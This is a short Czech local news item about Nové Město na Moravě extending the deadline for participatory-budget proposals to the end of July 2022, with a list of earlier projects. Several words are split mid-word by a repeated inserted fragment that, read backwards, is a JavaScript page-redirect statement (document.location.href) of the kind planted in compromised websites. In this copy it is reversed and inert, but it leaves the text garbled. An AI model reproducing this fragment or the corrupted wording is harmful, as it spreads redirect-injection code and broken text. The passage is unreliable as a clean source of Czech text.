Rainbow page separator

Návrhy veřejnosti je možné přihlašovat až do konce července

Neděle, 26. června 2022

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Mimořádně až do konce července novoměstská radnice prodloužila termín podávání návrhů k vylepšení veřejného pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru v třetím ročníku participativního rozpočtu. Původní termín byl 12. června. I v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce je počítáno s vyčleněnou finanční částkou ve výši 250 tisíc korun. Posuzování návrhů bude probíhat v prvních dvou srpnových týdnech, poté se uskuteční veřejné hlasování. S vítěznými projekty se veřejnost seznámí začátkem října.
Naposledy v rámci participativního rozpočtu došlo na jaře k realizaci odpočinkového mola u Černého rybníka, což byl současně nejúspěšnější návrh roku 2020, a již dříve byla založena komunitní zahrada v mateřské školce ve Žďárské ulici a komunitní sad u rybníka Koupaliště.
Z druhého ročníku participativního rozpočtu loni vzešla jako nejpozorovanější revitalizace dětského hřiště u rybníka Koupaliště. Na realizaci čeká také v pořadí druhý nejúspěšnější projekt, taktéž u Koupaliště, kterým je zřízení písečné pláže.